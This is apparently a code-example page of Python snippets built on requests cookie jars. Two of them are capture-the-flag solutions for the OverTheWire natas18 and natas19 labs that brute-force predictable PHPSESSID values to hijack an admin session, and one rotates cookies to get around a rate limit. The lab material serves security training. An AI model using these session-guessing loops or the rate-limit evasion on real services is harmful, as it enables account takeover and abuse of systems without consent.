Пример #1
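def session_handling():
    """Walk PHPSESSID values 1..460 on the natas18 lab and stop at the first
    response that is not the regular-user page.

    The exercise shows why a session identifier must not come from a small,
    sequential space: if the server accepts whatever ID the client presents,
    the ID is the only thing separating one user's session from another's.
    The server-side fix is to issue IDs from a CSPRNG with ample entropy,
    regenerate the ID at login, and throttle or alert on runs of unknown IDs.

    The upper bound of 460 is taken from the original loop; presumably it
    matches the ID range this lab uses (not verifiable from this file).
    Output is printed, nothing is returned.
    """
    base_url = 'http://natas18.natas.labs.overthewire.org/index.php'
    cookie_domain = 'natas18.natas.labs.overthewire.org'
    regular_marker = "are logged in as a regular"

    sess = requests.Session()
    auth_username = '******'
    auth_password = '******'
    _payload = {'username': '******', 'password': '******'}
    basic_auth = HTTPBasicAuth(auth_username, auth_password)

    # NOTE: the URL is plain http://, so the Basic credentials and the
    # session cookie cross the network unencrypted.
    sess.post(base_url, auth=basic_auth, data=_payload)

    for i in range(1, 461):
        new_cookie = RequestsCookieJar()
        new_cookie.set(name="PHPSESSID",
                       value=str(i),
                       domain=cookie_domain,
                       path="/")
        sess.cookies.update(new_cookie)
        response = sess.get(base_url, auth=basic_auth)

        # A substring test replaces the original bare ``except:``, which also
        # caught KeyboardInterrupt and reported it as an admin hit.
        if regular_marker in response.text:
            print(str(i) + " non admin account")
            continue

        # Any page lacking the marker lands here, error pages included; the
        # HTTP status is not checked.
        print(str(i) + " admin account ")
        print(response.text)
        break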
Пример #2
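def brute_force_PHPSESSID():
    """Walk hex-encoded PHPSESSID candidates on the natas19 lab and stop at
    the first response that matches none of the known non-admin pages.

    Each candidate is the hex form of the ASCII digits of ``i`` followed by
    ``2d61646d696e`` (hex for ``-admin``). The point of the exercise is that
    encoding a guessable value does not make it secret: the ID space is as
    small as the counter behind it. The server-side fix is the same as for
    any predictable ID -- CSPRNG-generated identifiers, no identity data
    inside the ID, and throttling or alerting on runs of unknown IDs.

    Output is printed, nothing is returned.
    """
    base_url = 'http://natas19.natas.labs.overthewire.org/index.php'
    cookie_domain = 'natas19.natas.labs.overthewire.org'

    sess = requests.Session()
    auth_username = '******'
    auth_password = '******'
    _payload = {'username': '******', 'password': '******'}
    basic_auth = HTTPBasicAuth(auth_username, auth_password)

    # NOTE: the URL is plain http://, so the Basic credentials and the
    # session cookie cross the network unencrypted.
    sess.post(base_url, auth=basic_auth, data=_payload)

    for i in range(1, 461):
        # "3" + digit is the hex byte of an ASCII digit (0x30..0x39). The
        # original inner loop reused the name ``i`` and shadowed the counter.
        prefix = "".join("3" + digit for digit in str(i))

        cookie_value = prefix + "2d61646d696e"
        new_cookie = RequestsCookieJar()
        new_cookie.set(name="PHPSESSID",
                       value=cookie_value,
                       domain=cookie_domain,
                       path="/")
        sess.cookies.update(new_cookie)

        response = sess.get(base_url, auth=basic_auth)
        text = response.text

        # Flat substring checks replace three nested bare ``except:`` blocks,
        # which also swallowed KeyboardInterrupt and other unrelated errors.
        if "are logged in as a regular" in text:
            print(prefix + " 2d61646d696e" +
                  " non admin account: regular user")
        elif "Uninitialized string offset:" in text:
            print(prefix + " 2d61646d696e" + " uninitialized")
        elif "login with your admin account to retrieve credentials for" in text:
            print(prefix + " 2d61646d696e" +
                  " non admin account: homepage")
        else:
            # Anything unrecognised ends the loop, error pages included; the
            # HTTP status is not checked.
            print(prefix + " 2d61646d696e" + " admin account ")
            print(response.text)
            break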
Пример #3
def loginwithcookies():
    """POST the module-level ``logindata`` to ``loginurl`` and return a new
    ``RequestsCookieJar``.

    NOTE(review): the jar returned is created here and never filled, so any
    session cookie set by the login response is discarded and callers always
    receive an empty jar. The commented-out lines in the original suggest the
    author meant to carry a JSESSIONID across requests -- confirm the intent
    before relying on the return value.
    """
    # The response object is not inspected: neither status nor cookies.
    requests.post(loginurl, logindata)
    return RequestsCookieJar()
Пример #4
def set_cookies(*args: Union[Mapping[str, Any], str],
                clear: bool = True) -> None:
    """Register several cookies in the module-level ``cookies`` list.

    Each positional argument is either a mapping of cookie names to values or
    a cookie string, the same forms ``set_cookie`` takes. Every argument ends
    up as its own ``RequestsCookieJar`` appended to ``cookies``.

    Per the original docstring, holding several cookies to cycle between is
    so far the only way to get around the service's rate limit. Seen from the
    service side, that implies the limit is keyed on the cookie alone.

    :param clear: when True (the default) the list is emptied first; pass
        False to keep the cookies that were set earlier.
    """
    if clear:
        cookies.clear()

    for spec in args:
        # SimpleCookie only takes string values, so mappings are stringified.
        raw = ({key: str(val) for key, val in spec.items()}
               if isinstance(spec, Mapping) else spec)
        parsed = SimpleCookie(raw)

        jar = RequestsCookieJar()
        jar.update(parsed)
        cookies.append(jar)
Пример #5
    def prepare_request(self, request):
        """Build a :class:`PreparedRequest` from ``request`` merged with this
        session's settings, and return it.

        Cookies, headers, params, auth and hooks from the request are each
        combined with the session-level values; the result is prepared on a
        ``CuPreparedRequest`` instance.

        :param request: :class:`Request` instance to prepare with this
            session's settings.
        :rtype: requests.PreparedRequest
        """
        # Accept a plain dict (or nothing) and normalise it to a CookieJar.
        request_jar = request.cookies or {}
        if not isinstance(request_jar, cookielib.CookieJar):
            request_jar = cookiejar_from_dict(request_jar)

        # Session cookies go into a fresh jar first, request cookies second.
        session_jar = merge_cookies(RequestsCookieJar(), self.cookies)
        merged_cookies = merge_cookies(session_jar, request_jar)

        # With trust_env set and no auth on either the request or the
        # session, credentials are looked up from netrc by URL. Callers that
        # must not send ambient credentials should turn trust_env off.
        auth = request.auth
        if self.trust_env and not (auth or self.auth):
            auth = get_netrc_auth(request.url)

        prepared = CuPreparedRequest()
        prepared.prepare(
            method=request.method.upper(),
            url=request.url,
            files=request.files,
            data=request.data,
            json=request.json,
            headers=merge_setting(request.headers,
                                  self.headers,
                                  dict_class=CaseInsensitiveDict),
            params=merge_setting(request.params, self.params),
            auth=merge_setting(auth, self.auth),
            cookies=merged_cookies,
            hooks=merge_hooks(request.hooks, self.hooks),
        )
        return prepared
Пример #6
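 def __init__(self, base, username=None, password=None, site='default', state=None, unifios=None):
     """Store connection settings and restore a cookie jar from ``state``.

     :param base: stored unchanged as ``self.base``.
     :param username: stored unchanged as ``self.username``.
     :param password: stored unchanged as ``self.password``; it stays on the
         instance in clear text.
     :param site: stored unchanged as ``self.site``.
     :param state: JSON text that is decoded and passed to
         ``cookiejar_from_dict``; presumably a previously saved cookie
         mapping. It holds session cookies, so it deserves the same
         protection as the password wherever it is persisted.
     :param unifios: passed to ``_set_type``; when it is None,
         ``_check_unifios`` is called instead of a second ``_set_type``.
     """
     self.base = base
     self.site = site
     self.username = username
     self.password = password
     self._set_type(unifios)
     # ``session`` records whether saved state was supplied.
     self.session = bool(state)
     if state:
         self.cookies = requests.cookies.cookiejar_from_dict(json.loads(state))
     else:
         self.cookies = RequestsCookieJar()
     # Identity test instead of ``None == unifios``: it cannot be affected by
     # a custom ``__eq__`` on the argument.
     if unifios is None:
         self._check_unifios()
     else:
         # NOTE(review): repeats the _set_type call above with the same
         # value; kept because _set_type's side effects are not visible here.
         self._set_type(unifios=unifios)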